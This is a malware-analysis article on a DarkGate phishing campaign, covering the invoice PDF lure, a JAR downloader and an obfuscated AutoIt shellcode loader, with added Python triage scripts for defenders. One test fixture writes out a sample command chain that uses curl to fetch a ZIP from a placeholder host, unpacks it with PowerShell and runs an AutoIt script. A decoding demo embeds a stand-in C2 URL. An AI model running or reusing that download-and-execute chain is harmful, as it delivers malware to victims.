DarkGate, a stealthy Remote Access Trojan (RAT), spreads primarily through phishing emails carrying malicious attachments in everyday formats such as XLSX, HTML and PDF, file types that recipients open without a second thought.
Once the attachment is opened the system is infected, and the operators then use hijacked email accounts to push the malware on to new victims. That self-propagation makes DarkGate difficult to detect and eradicate, and an infection can end in data breaches, financial losses and exposure of sensitive information.
Researchers identified a DarkGate campaign built on phishing emails carrying fake Intuit QuickBooks invoices. The emails tell recipients they must install Java and supply a link that bounces through a redirect to a malicious URL.
That URL serves the next-stage payload, most likely a malware dropper. The chain shows how attackers abuse legitimate services such as DoubleClick as open redirectors and trade on users' trust in established software (Java) to compromise systems.
The suspicious PDF, named "may-document_[number].pdf", presents itself as an invoice. Embedded in it is a large image (an XObject) with a hyperlink laid over it.
Clicking that link downloads a malicious Java Archive (.jar). The URLs in the download chain follow a pattern historically associated with QakBot operators: a unique domain per link with a single path segment.
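As an added illustration (not part of the original report or Forcepoint's analysis), the Python below triages a PDF for exactly the construction described above: a /Link annotation stretched over a page that holds an image XObject, whose /URI points at a host with a single path segment. The sample PDF, its hostname and path are constructed for the demo and are not indicators from the campaign.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for "may-document_[number].pdf": one page whose only
# content is an image XObject, with a full-page /Link annotation carrying a
# /URI action. The hostname is an assumption for the demo, not a real IOC.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]
  /Resources << /XObject << /Im0 5 0 R >> >> /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 612 792]
  /A << /S /URI /URI (https://invoice-example.invalid/a1b2c3) >> >> endobj
5 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1
  /ColorSpace /DeviceGray /BitsPerComponent 8 /Length 1 >>
stream
\x00
endstream
endobj
trailer << /Root 1 0 R >>
%%EOF
"""

MEDIABOX_RE = re.compile(rb"/MediaBox\s*\[\s*([-\d.\s]+)\]")
RECT_RE = re.compile(rb"/Rect\s*\[\s*([-\d.\s]+)\]")
URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")
LINK_RE = re.compile(rb"/Subtype\s*/Link")
IMAGE_RE = re.compile(rb"/Subtype\s*/Image")


def _area(box):
    x0, y0, x1, y1 = [float(v) for v in box.decode("latin-1").split()]
    return abs(x1 - x0) * abs(y1 - y0)


def triage_pdf_links(pdf_bytes, min_page_fraction=0.8):
    """Report every /Link annotation that carries a /URI action.

    Works on the raw object syntax, so it only sees objects stored
    uncompressed; objects packed into /ObjStm streams must be inflated first
    (for example with qpdf --qdf) before this helper can find them.
    """
    m = MEDIABOX_RE.search(pdf_bytes)
    page_area = _area(m.group(1)) if m else None
    links = []
    for obj in pdf_bytes.split(b"endobj"):
        if not LINK_RE.search(obj):
            continue
        uri_m = URI_RE.search(obj)
        if not uri_m:
            continue
        uri = uri_m.group(1).decode("latin-1")
        parts = urlsplit(uri)
        path_depth = len([p for p in parts.path.split("/") if p])
        rect_m = RECT_RE.search(obj)
        fraction = _area(rect_m.group(1)) / page_area if (rect_m and page_area) else None
        covers_page = fraction is not None and fraction >= min_page_fraction
        links.append({
            "uri": uri,
            "host": parts.hostname,
            "path_depth": path_depth,
            "page_fraction": fraction,
            # The pattern called out above: one host, one path segment, and the
            # link stretched over the page so that any click on the "invoice" fires it.
            "suspicious": path_depth == 1 and covers_page,
        })
    return {"image_xobject": IMAGE_RE.search(pdf_bytes) is not None, "links": links}


if __name__ == "__main__":
    print(triage_pdf_links(SAMPLE_PDF))
```

The page-coverage heuristic is what distinguishes a decoy invoice from a document with ordinary footnote links; tune min_page_fraction for documents where the image is a banner rather than the whole page.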
Forcepoint's analysis of the downloaded JAR in JD-GUI exposed a suspicious class holding an obfuscated command. The command uses an embedded curl executable to download a ZIP file into the Downloads directory (C:\Downloads).
If the download succeeds, the class invokes PowerShell to unpack the ZIP with the Expand-Archive cmdlet, which suggests the JAR is a downloader that obfuscates its real job: fetching and unpacking further malicious content.
The ZIP archive contains the AutoIt interpreter executable (.exe) and a compiled AutoIt script (.a3x); the JAR then runs the compiled script through another obfuscated command.
The script's header shows it was compiled with a recent AutoIt version, which gives it access to newer language features and matches earlier DarkGate campaigns known to use AutoIt.
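The downloader chain just described (JAR with bundled curl, curl to a ZIP, Expand-Archive, then AutoIt3.exe running a .a3x) leaves recognisable strings in the JAR's class constant pool unless the author split them at runtime. The following Python is an added static-triage example, not Forcepoint's tooling or the campaign's code: it parses the constant pool of each .class in a JAR, flags bundled PE files, and reports which of the chain's indicators appear. The sample JAR, its class, hostname and paths are all constructed for the demo.

```python
import io
import struct
import zipfile

# Fragments of the command chain described above, plus the AutoIt pieces the
# ZIP contained. Matched case-insensitively against constant-pool strings.
INDICATORS = ("curl", "expand-archive", "powershell", ".a3x", "autoit3", "downloads")

# Constant-pool tags with a fixed payload size (JVM spec, table 4.4-B);
# tag 1 (CONSTANT_Utf8) is variable length and handled separately.
CP_FIXED_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
                  15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_utf8_constants(data):
    """Return every CONSTANT_Utf8 string in a .class file's constant pool."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]
    pos, idx, out = 10, 1, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            length = struct.unpack(">H", data[pos:pos + 2])[0]
            out.append(data[pos + 2:pos + 2 + length].decode("utf-8", "replace"))
            pos += 2 + length
        else:
            pos += CP_FIXED_SIZES[tag]
        idx += 2 if tag in (5, 6) else 1  # long/double take two pool slots
    return out


def build_fake_class(strings):
    """Constructed .class prefix: header plus a constant pool of Utf8 entries.

    Everything after the pool is omitted because the parser above stops there;
    this is a test fixture, not a loadable class.
    """
    pool = b"".join(b"\x01" + struct.pack(">H", len(s.encode())) + s.encode() for s in strings)
    return b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", len(strings) + 1) + pool


def build_sample_jar():
    """Constructed stand-in for the downloaded JAR (host and paths are assumptions)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Loader\n")
        z.writestr("Loader.class", build_fake_class([
            "Loader", "java/lang/Object",
            "cmd.exe /c curl.exe -o C:\\Downloads\\inv.zip https://stage2.invalid/x",
            "powershell -c Expand-Archive C:\\Downloads\\inv.zip C:\\Downloads",
            "C:\\Downloads\\AutoIt3.exe C:\\Downloads\\script.a3x",
        ]))
        z.writestr("curl.exe", b"MZ" + b"\x00" * 62)  # PE stub standing in for bundled curl
    return buf.getvalue()


def triage_jar(jar_bytes):
    """Static triage: entry list, bundled PE files, Main-Class, indicator hits per class."""
    report = {"entries": [], "embedded_pe": [], "main_class": None, "hits": {}}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for name in z.namelist():
            data = z.read(name)
            report["entries"].append(name)
            if data[:2] == b"MZ":  # a Windows executable inside a JAR is a red flag on its own
                report["embedded_pe"].append(name)
            if name == "META-INF/MANIFEST.MF":
                for line in data.decode("utf-8", "replace").splitlines():
                    if line.startswith("Main-Class:"):
                        report["main_class"] = line.split(":", 1)[1].strip()
            if name.endswith(".class"):
                consts = " ".join(class_utf8_constants(data)).lower()
                hits = [i for i in INDICATORS if i in consts]
                if hits:
                    report["hits"][name] = hits
    return report


if __name__ == "__main__":
    print(triage_jar(build_sample_jar()))
```

When the pool shows only fragments (for example "cu" and "rl.exe" as separate constants), the command is being assembled at runtime; that is the point at which a decompiler such as JD-GUI, as used in the analysis above, or a sandboxed execution is needed rather than more string matching.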
The AutoIt script is designed to evade detection. It hides its logic behind obfuscation built on BitXOR() and BinaryToString(), assembles a large data blob and keeps it in memory for later use.
Calls to DllStructCreate() and DllStructSetData() point to the script allocating a memory buffer and writing that blob into it. Its most critical action is almost certainly executing shellcode from that buffer, presumably to open a connection to a remote command-and-control (C2) server.
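To show what the BitXOR()/BinaryToString() decode stage amounts to, and how an analyst recovers the key when the script buries it in obfuscated arithmetic, here is an added Python example written for this article rather than taken from the DarkGate script. The key value, the embedded URL and the shellcode-like tail bytes are all assumptions for the demo; the AutoIt fragment in the comment shows only the shape of such a loop.

```python
import string

# Shape of the AutoIt decode loop (illustrative, not the campaign's code):
#   $bin = Binary("0x" & $hex)              ; large hex literal, often split across variables
#   For $i = 1 To BinaryLen($bin)
#       $out &= Chr(BitXOR(Int(BinaryMid($bin, $i, 1)), $key))
#   Next
#   $buf = DllStructCreate("byte[" & StringLen($out) & "]")   ; stage the result in memory
#   DllStructSetData($buf, 1, $out)
KEY = 0x5A  # assumed single-byte key for the demo
PLAINTEXT = b"https://c2-example.invalid/gate" + b"\x00\x90\x90\xcc"  # config string + shellcode-like tail
MARKERS = (b"http", b"://", b"kernel32", b".dll")  # strings a decoded blob commonly contains


def autoit_hex_literal(data):
    """Render bytes the way AutoIt scripts embed a binary: "0x" followed by hex digits."""
    return "0x" + data.hex().upper()


def bitxor_bytes(data, key):
    """Per-byte BitXOR with a single-byte key; XOR is its own inverse."""
    return bytes(b ^ key for b in data)


def decode_literal(hex_literal, key):
    """Equivalent of BinaryToString over BitXOR'd bytes: hex literal -> XOR -> raw bytes."""
    return bitxor_bytes(bytes.fromhex(hex_literal[2:]), key)


def printable_ratio(data):
    return sum(chr(b) in string.printable for b in data) / max(len(data), 1)


def recover_single_byte_key(hex_literal, top=3):
    """Brute-force all 256 keys and rank candidates.

    Printable ratio alone is not enough: a key one bit away from the true one
    also yields almost-all-printable text, so a bonus is added when a known
    marker string appears (matched case-sensitively on purpose, since the
    case-flipping key 0x20 away would otherwise score a false bonus).
    """
    raw = bytes.fromhex(hex_literal[2:])
    scored = []
    for k in range(256):
        cand = bitxor_bytes(raw, k)
        bonus = 1.0 if any(m in cand for m in MARKERS) else 0.0
        scored.append((printable_ratio(cand) + bonus, k, cand))
    scored.sort(reverse=True)
    return [(k, cand) for _, k, cand in scored[:top]]


# What the script would actually carry: the XOR'd payload as a hex literal.
OBFUSCATED = autoit_hex_literal(bitxor_bytes(PLAINTEXT, KEY))

if __name__ == "__main__":
    print(OBFUSCATED)
    key, data = recover_single_byte_key(OBFUSCATED)[0]
    print(hex(key), data)
```

Once the blob is decoded, the bytes written via DllStructSetData() are what a sandbox or debugger should be pointed at; the C2 address, if any, is usually visible as a plain string inside it, as the constructed sample shows.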